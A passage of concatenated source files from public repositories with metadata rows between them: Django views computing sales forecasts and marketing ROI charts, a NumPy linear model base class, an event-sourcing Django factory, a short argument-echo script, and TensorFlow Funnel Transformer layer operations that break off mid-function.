dfT2=pd.DataFrame(dfT2)
dfT3={'Sales':st3}
dfT3=pd.DataFrame(dfT3)
a=NoMonths
if a==1:
r=dfT
elif a==2:
r=dfT.append(dfT2,ignore_index=True)
elif a==3:
r=dfT.append(dfT2,ignore_index=True)
r=r.append(dfT3,ignore_index=True)
rr=r['Sales'].tolist()
df_forecast=pd.DataFrame(data=rr,index=dfe_forecast.tail(a).index,columns=r.columns)
print(df_forecast)
simulation=fulldfForecast1_2.tail(5).merge(df_forecast,how='left',left_index=True, right_index=True)[['Sales_pred','Sales']]
simulation.Sales.fillna(simulation.Sales_pred,inplace=True)
simulation['date'] = simulation.index
simulation['date']=simulation['date'].dt.strftime('%Y/%b/%d')
forecastsales=simulation['Sales_pred'].values.tolist()
simulationSales=simulation['Sales'].values.tolist()
simulationDate=simulation['date'].values.tolist()
print("Checking shapes--------------------")
print(contribution2.columns)
print(elasticity.columns)
df_tt=ROI(contribution2,elasticity2,3,2019,"Jan")
Investment_type=df_tt['Investment Type'].values.tolist()
ROI1=df_tt['ROI'].values.tolist()
context= {'years':years,'months':months,'bigcs':bigcs,'brands':brands, 'Fbrands':Fbrands,'Bbrands':Bbrands,'HCbrands':HCbrands,'SCbrands':SCbrands,
'yearf':yearf, 'monthf':monthf,'bigcf':bigcf,'brandf':brandf,'NoMonths':NoMonths,
'Sale_Amount':Sale_Amount,'Sale_Date':Sale_Date,'columnlist2':columnlist2,
'forecastsales':forecastsales,'simulationSales':simulationSales,'simulationDate':simulationDate,
'Investment_type':Investment_type,'ROI1':ROI1,'Sale_Amount1':Sale_Amount1,'Sale_Amount2':Sale_Amount2,
'Sale_Date1':Sale_Date1 ,'Sale_Date2':Sale_Date2,'Sale_AmountP':Sale_AmountP,'AndP1':AndP1
}
return render(request,'predict.html',context)
def comparision(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
Fbrands = cd_FoodBrands()
Bbrands = cd_BeveragesBrands()
HCbrands = cd_HomeProductsBrands()
SCbrands = cd_SelfCareBrands()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
branf = request.POST.get('brand')
# filter data frame
if request.method == "POST":
df = SummarydataframeCreation()
# df1 = df[(df.year == yearf)&(df.bigc == bigcf)|(df.Brand_name == branf)]
df1 = df[(df.year == yearf)&(df.bigc == bigcf)]
df1_1 = df[(df.year == yearf)&(df.month == monthf)&(df.bigc == bigcf)&(df.Brand_name == branf)]
else:
df = SummarydataframeCreation()
df = df.sort_values(by='date')
a = df['year'].iloc[-1]
b = df['month'].iloc[-1]
df1 = df[(df.year == a)]
df1_1 = df[(df.year == a)&(df.month == b)]
# Monthly sales chart1
df2 = df1.groupby('month', as_index=False).agg({"Sales": "sum"})
df2 = Sort_Dataframeby_Month(df=df2, monthcolumnname='month')
Sale_Date = df2['month'].values.tolist()
Sale_Amount = df2['Sales'].values.tolist()
# monthly investment chart2
df4 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df4 = pd.melt(df4, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df4 = df4.groupby(['month','date'])['value'].sum().reset_index()
df4 = Sort_Dataframeby_Month(df=df4, monthcolumnname='month')
investment_month = df4['month'].values.tolist()
investment_Amount = df4['value'].values.tolist()
# investment for promotion type chart3
df5 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df5 = pd.melt(df5, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df5 = df5.groupby(['month', 'Investment_Types'])['value'].sum().reset_index()
df5 = Sort_Dataframeby_Month(df=df5, monthcolumnname='month')
df5_1= df5[df5['Investment_Types'] == 'AandP']
investment_Amount_A_P = df5_1['value'].values.tolist()
investment_month_A_P = df5_1['month'].values.tolist()
df5_2 = df5[df5['Investment_Types'] == 'Consumer_Promotion']
investment_Amount_Consumer_Promotion = df5_2['value'].values.tolist()
df5_3 = df5[df5['Investment_Types'] == 'Display_Only']
investment_Amount_Display_Only = df5_3['value'].values.tolist()
df5_4 = df5[df5['Investment_Types'] == 'Distributor_Margins']
investment_Amount_Distributor_Margins = df5_4['value'].values.tolist()
df5_5 = df5[df5['Investment_Types'] == 'JBP']
investment_Amount_JBP = df5_5['value'].values.tolist()
df5_6 = df5[df5['Investment_Types'] == 'Loyalty_Schemes']
investment_Amount_Loyalty_Schemes = df5_6['value'].values.tolist()
df5_7 = df5[df5['Investment_Types'] == 'Search_Only']
investment_Amount_Search_Only = df5_7['value'].values.tolist()
df5_8 = df5[df5['Investment_Types'] == 'Trade_Promotion']
investment_Amount_Trade_Promotion = df5_8['value'].values.tolist()
df5_9 = df5[df5['Investment_Types'] == 'Video']
investment_Amount_Video = df5_9['value'].values.tolist()
df5_10 = df5[df5['Investment_Types'] == 'facebook']
investment_Amount_facebook = df5_10['value'].values.tolist()
df5_11 = df5[df5['Investment_Types'] == 'instagram']
investment_Amount_instagram = df5_11['value'].values.tolist()
df5_12 = df5[df5['Investment_Types'] == 'messenger']
investment_Amount_messenger = df5_12['value'].values.tolist()
# Total sales/ total investments chart 4
if request.method == "POST":
df6 = df1[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6 = pd.melt(df6, id_vars=['date', 'month','bigc','Sales'], var_name='Investment_Types', value_name='value')
df6 = df6.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df6['ROI'] = df6['Sales']/(df6['value'])
ROI_value = df6['ROI'].values.tolist()
ROI_month = df6['month'].values.tolist()
else:
df7 = df1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
# ROI for promotion types chart5
if request.method == "POST":
df13 = df1_1.groupby(['year','month','Brand_name'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'year','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['year', 'month','Sales','Brand_name'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
else:
df13 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
# ROI with contribution
# NoMonths=3
# bigcf ='Foods'
# brandf ='Brd00001'
# dfprep=DataPreprocessing(bigcf,brandf)
# df2,seconddiff,finaldf=test2(dfprep)
# results=VARmodel(df2)
# dfe_forecast=forecastData(results,df2,NoMonths,dfprep)
# invertsale1=invert_transformation(dfprep,df2,second_diff=seconddiff)
# invertsale1=np.exp(invertsale1)
# invertSale=invert_transformation(dfprep,dfe_forecast,second_diff=seconddiff)
# invertSale=np.exp(invertSale)
# #invert sale has only forecast data
# #finaldf has the actual data
# #appending the both dataframes togather to chart 1
# #takes only last 12 rows for the plot as in line 146
# fulldfForecast1=finaldf.append(invertSale)
# #keeping a copy for later purpose
# fulldfForecast1_2=fulldfForecast1.copy()
# fulldfForecast1['date'] = fulldfForecast1.index
# fulldfForecast1['date']=fulldfForecast1['date'].dt.strftime('%Y/%b/%d')
# fulldfForecast1['Sales2']=fulldfForecast1['Sales']
# fulldfForecast1=fulldfForecast1.tail(12)
# A=fulldfForecast1.iloc[:-NoMonths]
# A['Date']=A.index
# A['Date']=A['Date'].dt.strftime('%Y/%b/%d')
# B=fulldfForecast1.tail(NoMonths)
# B['Date']=B.index
# B['Date']=B['Date'].dt.strftime('%Y/%b/%d')
# Sale_Date = fulldfForecast1['date'].values.tolist()
# Sale_Amount =fulldfForecast1['Sales'].values.tolist()
# Sale_AmountP =fulldfForecast1['Sales2'].values.tolist()
# Sale_Amount1 =A['Sales'].values.tolist()
# Sale_Amount2 =B['Sales'].values.tolist()
# Sale_Date1 = A['Date'].values.tolist()
# Sale_Date2 = B['Date'].values.tolist()
# #contribution chart
# x=fulldfForecast1_2.shape[0]
# elasticity=impulseResponse(results,x,fulldfForecast1_2)
# contribution=Contribution(elasticity,fulldfForecast1_2)
# contribution2=contribution.copy()
# df_tt=ROI(contribution2,elasticity,3,2019,"Jan")
# Investment_type=df_tt['Investment Type'].values.tolist()
# ROI1=df_tt['ROI'].values.tolist()
# get values for cart1 (total sales)
total_sales_cart = df1_1['Sales'].sum()/1000000
total_sales_cart = round(total_sales_cart, 2)
# get values for cart2 (total investment)
df3_1 = df1_1[['date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins', 'Loyalty_Schemes',
'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df3_1 = pd.melt(df3_1, id_vars=['date'], var_name='Investment_Types', value_name='value')
df3_1 = df3_1.groupby(['date'])['value'].sum().reset_index()
df3_1['Date'] = pd.to_datetime(df3_1['date'])
investment_Amount_cart = df3_1['value'].sum()/1000000
investment_Amount_cart=round(investment_Amount_cart, 2)
#get values for cart3 (total sales/ total investments)
if request.method == "POST":
df6_1 = df1_1[['month', 'date','bigc','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6_1 = pd.melt(df6_1, id_vars=['date', 'month','bigc','Brand_name','Sales'], var_name='Investment_Types', value_name='value')
df6_1 = df6_1.groupby(['date','month','bigc','Brand_name','Sales'])['value'].sum().reset_index()
df6_1['ROI'] = df6_1['Sales']/(df6_1['value'])
ROI_value_cart = round(df6_1['ROI'].sum(),4)
else:
df6_1 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df6_1[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
context = {'years':years,'months':months,'bigcs':bigcs,
'Fbrands':Fbrands,'Bbrands':Bbrands,'HCbrands':HCbrands,'SCbrands':SCbrands,
'yearf':yearf, 'monthf':monthf,'bigcf':bigcf,'brandf':branf,
'Sale_Date':Sale_Date ,'Sale_Amount':Sale_Amount,
'investment_Amount':investment_Amount, 'investment_month':investment_month,
'investment_Amount_A_P':investment_Amount_A_P,'investment_month_A_P':investment_month_A_P
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'investment_Amount_Display_Only':investment_Amount_Display_Only
,'investment_Amount_Distributor_Margins':investment_Amount_Distributor_Margins
,'investment_Amount_JBP':investment_Amount_JBP
,'investment_Amount_Loyalty_Schemes':investment_Amount_Loyalty_Schemes
,'investment_Amount_Search_Only':investment_Amount_Search_Only
,'investment_Amount_Trade_Promotion':investment_Amount_Trade_Promotion
,'investment_Amount_Video':investment_Amount_Video
,'investment_Amount_facebook':investment_Amount_facebook
,'investment_Amount_instagram':investment_Amount_instagram
,'investment_Amount_messenger':investment_Amount_messenger
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'total_sales_cart': total_sales_cart,'investment_Amount_cart':investment_Amount_cart,
'ROI_value':ROI_value,'ROI_month':ROI_month, 'ROI_value_cart':ROI_value_cart
,'ROI_Investment_value':ROI_Investment_value,'ROI_Investment_Types':ROI_Investment_Types
# ,'Investment_type':Investment_type,'ROI1':ROI1
}
#get values for cart4 (sales growth)
#get previous month
if request.method == "POST":
current_month = list(calendar.month_abbr).index(monthf)
previous_month = current_month-1
previous_month_abb = calendar.month_abbr[previous_month]
current_year = yearf
if previous_month == 0:
previous_month = 12
previous_month_abb = calendar.month_abbr[previous_month]
current_year = int(yearf)-1
current_year = str(current_year)
df_total_sales_for_previous_month = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == current_year)&(df.month == previous_month_abb)]
previous_total_sales = df_total_sales_for_previous_month['Sales'].sum()/1000000
sales_growth_cart = (total_sales_cart - previous_total_sales)/previous_total_sales *100
sales_growth_cart = round(sales_growth_cart, 2)
context.update({'sales_growth_cart': sales_growth_cart})
else:
pass
return render(request,'comparision.html',context)
|
[
"62302888+kasunsampathhewage@users.noreply.github.com"
] |
62302888+kasunsampathhewage@users.noreply.github.com
|
01fb8d05747375d68eb2132a21d9bb541e452ffc
|
4443a051136c23156fefc56b50e467dd0717dc07
|
/mp1/models/linear_model.py
|
590971e33d18b64f79a836c4289ea68fbafee408
|
[] |
no_license
|
therealJacobWu/pattern_recognition
|
6eefbbaa2d8584b800b234c4073b3704469a446a
|
09fe9c0054110f9ba10116a5cf3fc42a6eb58a54
|
refs/heads/master
| 2021-08-28T20:26:39.898397
| 2017-12-13T04:09:51
| 2017-12-13T04:09:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,073
|
py
|
"""Linear model base class."""
import abc
import numpy as np
import six
@six.add_metaclass(abc.ABCMeta)
class LinearModel(object):
"""Abstract class for linear models."""
def __init__(self, ndims, w_init='zeros'):
"""Initialize a linear model.
This function prepares an uninitialized linear model.
It will initialize the weight vector, self.w, based on the method
specified in w_init.
We assume that the last index of w is the bias term, self.w = [w,b]
self.w(numpy.ndarray): array of dimension (n_dims+1,)
w_init needs to support:
'zeros': initialize self.w with all zeros.
'ones': initialze self.w with all ones.
'uniform': initialize self.w with uniform random number between [0,1)
Args:
ndims(int): feature dimension
w_init(str): types of initialization.
"""
self.ndims = ndims
self.w_init = w_init
if w_init == 'zeros':
self.w = np.zeros((ndims+1,))
elif w_init == 'ones':
self.w = np.ones((ndims+1,))
elif w_init == 'uniform':
self.w = np.random.uniform(size = (ndims+1),)
else:
self.w = None
self.x = None
def forward(self, x):
"""Forward operation for linear models.
Performs the forward operation, f=w^Tx, and return f.
Args:
x(numpy.ndarray): Dimension of (N, ndims), N is the number
of examples.
Returns:
f(numpy.ndarray): Dimension of (N,)
"""
self.x = np.ones((x.shape[0],x.shape[1]+1));
self.x[:,0:x.shape[1]] = x
f = np.dot(self.x , self.w)
return f
@abc.abstractmethod
def backward(self, f, y):
"""Do not need to be implemented here."""
pass
@abc.abstractmethod
def loss(self, f, y):
"""Do not need to be implemented here."""
pass
@abc.abstractmethod
def predict(self, f):
"""Do not need to be implemented here."""
pass
|
[
"chenhaowu@ChenhaotekiMacBook-Pro.local"
] |
chenhaowu@ChenhaotekiMacBook-Pro.local
|
6aa1d2b7a3e804cf44a8f2b7ac61880dff987f25
|
fe741e533cfd22d609a5c2d6250fc491dcf521e0
|
/eventsourcing/infrastructure/django/factory.py
|
d264ec975f0e663b614c5f8319827804bbf0860f
|
[
"BSD-3-Clause"
] |
permissive
|
matiasbastos/eventsourcing
|
963631cdd98b5eecab7dbf92a2eefeee98e01c51
|
b91eaa9bd8abb5f29591d5ecbb2cca1f37414256
|
refs/heads/develop
| 2021-05-04T21:11:43.800055
| 2018-02-17T22:02:17
| 2018-02-17T22:02:17
| 119,893,330
| 0
| 0
| null | 2018-02-17T22:02:18
| 2018-02-01T21:03:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
from eventsourcing.infrastructure.django.manager import DjangoRecordManager
from eventsourcing.infrastructure.django.models import IntegerSequencedRecord, TimestampSequencedRecord, SnapshotRecord
from eventsourcing.infrastructure.factory import InfrastructureFactory
class DjangoInfrastructureFactory(InfrastructureFactory):
record_manager_class = DjangoRecordManager
integer_sequenced_record_class = IntegerSequencedRecord
timestamp_sequenced_record_class = TimestampSequencedRecord
snapshot_record_class = SnapshotRecord
def __init__(self, convert_position_float_to_decimal=False, *args, **kwargs):
super(DjangoInfrastructureFactory, self).__init__(*args, **kwargs)
self.convert_position_float_to_decimal = convert_position_float_to_decimal
def construct_record_manager(self, **kwargs):
return super(DjangoInfrastructureFactory, self).construct_record_manager(
convert_position_float_to_decimal=self.convert_position_float_to_decimal, **kwargs)
|
[
"john.bywater@appropriatesoftware.net"
] |
john.bywater@appropriatesoftware.net
|
e3448b44562219ac5116888f3463cc2fb4461c4d
|
2f533fd2b568afaa381a0a3a7aeb29c3ee3e3425
|
/test/echonl.0.py
|
d3354865f60d0a48e11a8847d6717dfcfbcc4468
|
[] |
no_license
|
mwan780/softconass1
|
8443d3267e02f135ddc1160eb4edde93bfdc3a61
|
5bafdb1a7ac37df82fd0dcf01c04f4a28ca30a1c
|
refs/heads/master
| 2021-01-19T09:44:23.532788
| 2013-09-30T06:07:01
| 2013-09-30T06:07:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
#!/usr/bin/python
import sys
for arg in sys.argv[1:]:
print arg
|
[
"sfal610@cse.unsw.EDU.AU"
] |
sfal610@cse.unsw.EDU.AU
|
e7b74b8dc1fe3b954b253b88f20c408d777721b4
|
552e4f19e6558aa73428333d98d47a2baa0b9e03
|
/tensorflow/funnel_transformer_ops.py
|
b6b03858c7c36cdfa293461d1c2b3c3f6de99c86
|
[
"MIT"
] |
permissive
|
yyht/Funnel_Transformer
|
6c17ad12bb6ab5dcbd3f6161b830237dc61add26
|
4b35a794d5e122a8054471863a52d4eac1c39dcd
|
refs/heads/master
| 2022-12-08T08:47:59.692029
| 2020-08-24T07:35:04
| 2020-08-24T07:35:04
| 279,195,871
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,331
|
py
|
"""Common operations used to construct model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
import tensorflow as tf
import functools
# from utils.bert import bert_utils
# from utils.bert import dropout_utils
# stable_dropout = dropout_utils.ReuseDropout()
# from absl import flags
# import absl.logging as _logging
# FLAGS = flags.FLAGS
INF = 1e6
EPS = 1e-9
def check_tf_version():
version = tf.__version__
print("==tf version==", version)
if int(version.split(".")[0]) >= 2 or int(version.split(".")[1]) >= 15:
return True
else:
return False
###############################################################################
##### Utils
###############################################################################
def safe_precision(func):
"""Safe precision decorator."""
@functools.wraps(func)
def wrapped_func(inputs, *args, **kwargs):
"""Turn inputs into float32 for computation."""
if inputs.dtype != tf.float32:
fp32_inputs = tf.cast(inputs, tf.float32)
else:
fp32_inputs = inputs
output = func(fp32_inputs, *args, **kwargs)
if output.dtype != inputs.dtype:
output = tf.cast(output, inputs.dtype)
return output
return wrapped_func
def get_einsum_prefix(ndims, einsum_symbols=None):
if einsum_symbols is None:
einsum_symbols = ["u", "v", "w", "x", "y", "z"]
assert ndims <= len(einsum_symbols)
einsum_prefix = ""
for i in range(ndims):
einsum_prefix += einsum_symbols[i]
return einsum_prefix
def update_ret_dict(tgt, src, prefix=None):
if prefix is None:
tgt.update(src)
else:
for k, v in src.items():
tgt["{}/{}".format(prefix, k)] = v
return tgt
###############################################################################
##### Common ops
###############################################################################
safe_softmax = safe_precision(tf.nn.softmax)
def embedding_lookup(x, n_embed, d_embed, initializer, lookup_table=None,
use_tpu=True, scope="embedding", reuse=None,
dtype=tf.float32, embedding_table_adv=None):
"""tpu and gpu embedding_lookup function."""
with tf.variable_scope(scope, reuse=reuse):
if lookup_table is None:
lookup_table = tf.get_variable("lookup_table", shape=[n_embed, d_embed],
dtype=dtype, initializer=initializer)
if embedding_table_adv is not None:
embedding_table_adv += lookup_table
tf.logging.info("==apply adv embedding==")
else:
embedding_table_adv = lookup_table
tf.logging.info("==apply normal embedding==")
if len(x.shape.as_list()) == 2:
one_hot_idx = tf.one_hot(x, n_embed, dtype=dtype)
tf.logging.info("==apply onehot embedding==")
elif len(x.shape.as_list()) == 3:
one_hot_idx = x
tf.logging.info("==apply gumbel embedding==")
else:
one_hot_idx = tf.one_hot(x, n_embed, dtype=dtype)
tf.logging.info("==apply onehot embedding==")
if len(x.shape.as_list()) == 2:
einsum_prefix = get_einsum_prefix(x.shape.ndims)
einsum_str = "{0}n,nd->{0}d".format(einsum_prefix)
elif len(x.shape.as_list()) == 3:
einsum_prefix = get_einsum_prefix(x.shape.ndims)
einsum_str = "{0}n,nd->{0}d".format(einsum_prefix[:-1])
else:
einsum_prefix = get_einsum_prefix(x.shape.ndims)
einsum_str = "{0}n,nd->{0}d".format(einsum_prefix)
tf.logging.info("*** einsum_str: %s ***", einsum_str)
output = tf.einsum(einsum_str, one_hot_idx, embedding_table_adv)
print(one_hot_idx.get_shape(), embedding_table_adv.get_shape(),
"==embedding shape==", einsum_str, output.get_shape())
return output, lookup_table
def dense(x, out_shape, initializer, inp_shape=None, begin_axis=-1,
use_bias=True, activation=None, scope="dense", reuse=False):
"""A more flexible dense layer."""
if isinstance(out_shape, int):
out_shape = [out_shape]
if inp_shape is None:
inp_shape = x.shape.as_list()[begin_axis:]
elif isinstance(inp_shape, int):
inp_shape = [inp_shape]
inp_syms = ["a", "b", "c", "d"]
out_syms = ["e", "f", "g", "h"]
prefix = get_einsum_prefix(x.shape.ndims - len(inp_shape))
inp_str = get_einsum_prefix(len(inp_shape), inp_syms)
out_str = get_einsum_prefix(len(out_shape), out_syms)
with tf.variable_scope(scope, reuse=reuse):
kernel_shape = inp_shape + out_shape
kernel = tf.get_variable("kernel",
kernel_shape,
dtype=x.dtype,
initializer=initializer)
output = tf.einsum(
"{0}{1},{1}{2}->{0}{2}".format(prefix, inp_str, out_str), x, kernel)
print(x.get_shape(), kernel.get_shape(), "==dense shape==", prefix,
inp_str, out_str, output.get_shape())
if use_bias:
bias = tf.get_variable("bias",
out_shape,
dtype=x.dtype,
initializer=tf.zeros_initializer())
output += bias
if activation is not None:
output = activation(output)
return output
@safe_precision
def layer_norm_op(inputs,
norm_shape=None,
begin_norm_axis=-1,
center=True,
scale=True,
activation_fn=None,
reuse=None,
trainable=True,
name=None):
"""Custom Layer Normalization layer."""
if norm_shape is None:
# If `norm_shape` is not provided, use `begin_norm_axis` to infer
norm_shape = inputs.shape[begin_norm_axis:]
elif isinstance(norm_shape, int):
# If `norm_shape` is provided as int, convert it to list
norm_shape = [norm_shape]
with tf.variable_scope(name, "layer_norm", [inputs], reuse=reuse):
inputs_rank = inputs.shape.ndims
if inputs_rank is None:
raise ValueError("Inputs %s has undefined rank." % inputs.name)
dtype = inputs.dtype.base_dtype
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta = tf.get_variable(
"beta",
shape=norm_shape,
dtype=dtype,
initializer=tf.zeros_initializer(),
trainable=trainable)
if scale:
gamma = tf.get_variable(
"gamma",
shape=norm_shape,
dtype=dtype,
initializer=tf.ones_initializer(),
trainable=trainable)
# By default, compute the moments across all the dimensions except the one
# with index 0.
norm_axes = list(range(inputs_rank - len(norm_shape), inputs_rank))
mean, variance = tf.nn.moments(inputs, norm_axes, keep_dims=True)
# Compute layer normalization using the batch_normalization function.
# Note that epsilon must be increased for float16 due to the limited
# representable range.
variance_epsilon = 1e-8 if dtype != tf.float16 else 1e-3
outputs = tf.nn.batch_normalization(
inputs,
mean,
variance,
offset=beta,
scale=gamma,
variance_epsilon=variance_epsilon)
outputs.set_shape(inputs.shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return outputs
# def dropout_op(tensor, rate, training, *args, **kwargs):
# kwargs["dtype"] = tensor.dtype
# dropout_func = tf.keras.layers.Dropout(rate, *args, **kwargs)
# return dropout_func(tensor, training=training)
def dropout_op(tensor, rate, training, *args, **kwargs):
dropout_name = kwargs.get('name', "")
# if dropout_name:
# output = stable_dropout.dropout(tensor, rate, dropout_name)
# else:
tf.logging.info("****** dropout name: %s, rate: %s"%(dropout_name, str(rate)))
if rate is None or rate == 0.0:
return tensor
if training:
tf.logging.info("****** dropout *******")
return tf.nn.dropout(tensor, keep_prob=1.0 - rate)
else:
tf.logging.info("****** original *******")
return tensor
def gelu(x):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
x: float Tensor to perform activation.
Returns:
`x` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + tf.tanh(
(np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))
return x * cdf
def get_activation(activation_type):
"""Get the corresponding activation function from string."""
if activation_type == "relu":
activation = tf.nn.relu
elif activation_type == "gelu":
activation = gelu
elif activation_type == "tanh":
activation = tf.tanh
else:
raise ValueError("Unsupported activation type {}".format(activation_type))
return activation
###############################################################################
##### Trasnformer ops
###############################################################################
def residual_and_layer_norm(residual, hidden, norm_shape=None):
"""Perform residual & layer normalization."""
ret_dict = {}
if residual is not None:
output = hidden + residual
else:
output = hidden
output = layer_norm_op(output, norm_shape=norm_shape, name="layer_norm")
return output, ret_dict
def positionwise_ffn(inp, d_model, d_inner, dropout, dropact, initializer,
activation_type="gelu", scope="ff", is_training=True,
reuse=None, name="ffn"):
"""Position-wise Feed-forward Network."""
ret_dict = {}
activation = get_activation(activation_type)
output = inp
with tf.variable_scope(scope, reuse=reuse):
# mlp part
output = dense(output, d_inner, inp_shape=d_model, activation=activation,
initializer=initializer, scope="layer_1")
output = dropout_op(output, dropact, training=is_training, name=name+"/ffn_drop_1")
output = dense(output, d_model, initializer=initializer, inp_shape=d_inner,
scope="layer_2")
output = dropout_op(output, dropout, training=is_training, name=name+"/fnn_drop_2")
# post ffn process
output, res_lnorm_dict = residual_and_layer_norm(inp, output,
norm_shape=d_model)
# add to monitor dict
ret_dict = update_ret_dict(ret_dict, res_lnorm_dict)
return output, ret_dict
def rel_attn_core(
d_model, n_head, d_head, q, k, v, pos_enc, seg_mat, attn_mask, attn_bias,
dropatt, is_training, initializer, func_mask=None,
rel_attn_type="factorized", name="rel_attn"):
"""Core relative positional attention operations."""
ret_dict = {}
tf_float = q.dtype
q_head = dense(q, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="q", use_bias=False)
k_head = dense(k, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="k")
v_head = dense(v, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="v")
# scale `q_head`
scale = tf.cast(1.0 / np.sqrt(d_head), tf_float)
q_head = q_head * scale
# content based attention score
r_w_bias = tf.get_variable("r_w_bias", [n_head, d_head],
dtype=tf_float, initializer=initializer)
if not check_tf_version():
# print((q_head + r_w_bias * scale).get_shape(), k_head.get_shape())
content_bias = tf.einsum("aind,ajnd->anij",
q_head + r_w_bias * scale, k_head)
else:
content_bias = tf.einsum("...ind,...jnd->...nij",
q_head + r_w_bias * scale, k_head)
print(q_head.get_shape(), (r_w_bias * scale).get_shape(), k_head.get_shape(),
"==rel_attn_core shape==", content_bias.get_shape())
# position based attention score
if pos_enc is None:
pos_bias = 0
else:
##### Utilize the decomposed version when using TPU #####
if rel_attn_type == "factorized":
# if FLAGS.verbose:
tf.logging.info("Compute rel-pos attn with factorized implementation.")
pos_bias = rel_pos_bias(q_head, pos_enc, d_model, n_head, d_head,
initializer, func_mask=func_mask, dtype=tf_float)
elif rel_attn_type == "rel_shift":
# if FLAGS.verbose:
tf.logging.info("Compute rel-pos attn with rel-shift implementation.")
klen = tf.shape(content_bias)[-1]
pos_bias = rel_pos_bias_gpu(q_head, pos_enc, d_model, n_head, d_head,
klen, initializer, func_mask=func_mask,
dtype=tf_float)
else:
